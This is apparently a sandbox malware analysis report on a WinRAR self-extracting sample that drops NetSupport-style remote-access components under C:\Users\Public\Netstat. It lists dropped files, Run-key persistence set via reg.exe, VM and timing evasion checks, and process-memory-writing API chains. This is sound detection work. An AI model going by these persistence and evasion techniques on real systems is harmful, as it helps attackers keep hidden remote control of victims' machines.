                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000006.00000002.3900156283.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000007.00000002.2164341754.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.2252286300.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000A.00000002.2326094910.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000006.00000002.3900362528.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000007.00000002.2164541647.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.2252520628.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000A.00000002.2326293538.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000000.2053735718.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.2241928402.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000002.2325321884.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000000.2323620387.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000006.00000002.3900285407.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000007.00000002.2164476357.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.2252435927.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000A.00000002.2326221599.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,6_2_11029590
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_6143078Jump to behavior
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DD8B6 push ecx; ret 0_2_003DD8C9
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DCDF0 push eax; ret 0_2_003DCE0E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1116F055 push ecx; ret 6_2_1116F068
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11169F49 push ecx; ret 6_2_11169F5C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C606BBF push ecx; ret 6_2_6C606BD2
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5F94C5 push ecx; ret 6_2_6C5F94D8
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1116F055 push ecx; ret 7_2_1116F068
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11169F49 push ecx; ret 7_2_11169F5C
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\bild.exeJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\Netstat\PCICL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5E7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,6_2_6C5E7030
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5D5490 GetPrivateProfileIntA,6_2_6C5D5490
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5D50E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_6C5D50E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5D5117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,6_2_6C5D5117
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,6_2_11127E10
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run NetstatJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,6_2_11139090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,6_2_1115B1D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_11113290
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,6_2_110254A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_110258F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,6_2_11023BA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11024280
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11112670 IsIconic,GetTickCount,6_2_11112670
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_110C0BB0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,7_2_1115B1D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,7_2_11139090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,7_2_11113290
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CB2B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,7_2_110254A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_110258F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,7_2_11023BA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11024280
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11112670 IsIconic,GetTickCount,7_2_11112670
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,7_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,7_2_111229D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,7_2_110C0BB0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_1115ADD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_11143570
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5D91F06_2_6C5D91F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5E4F306_2_6C5E4F30
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110B8200 Sleep,ExitProcess,6_2_110B8200
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110B8200 Sleep,ExitProcess,7_2_110B8200
                                Source: C:\Users\Public\Netstat\bild.exeWindow / User API: threadDelayed 937Jump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeDropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeDropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeDropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_6-94526
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_6-95728
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_6-96411
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_6-99654
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decisiongraph_6-100053
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvaded block: after key decision
                                Source: C:\Users\Public\Netstat\bild.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\Public\Netstat\bild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_6-99793
                                Source: C:\Users\Public\Netstat\bild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-99494
                                Source: C:\Users\Public\Netstat\bild.exeAPI coverage: 6.0 %
                                Source: C:\Users\Public\Netstat\bild.exeAPI coverage: 2.6 %
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5E4F306_2_6C5E4F30
                                Source: C:\Users\Public\Netstat\bild.exe TID: 7260Thread sleep time: -93700s >= -30000sJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\Public\Netstat\bild.exeLast function: Thread delayed
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_6C5E3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C5E3226h6_2_6C5E3130
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003CA273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_003CA273
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DA537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_003DA537
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003E7D78 FindFirstFileExA,0_2_003E7D78
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110AFD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_1110AFD0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DC8D5 VirtualQuery,GetSystemInfo,0_2_003DC8D5
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.claal*
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000002.2050597046.0000000000D19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
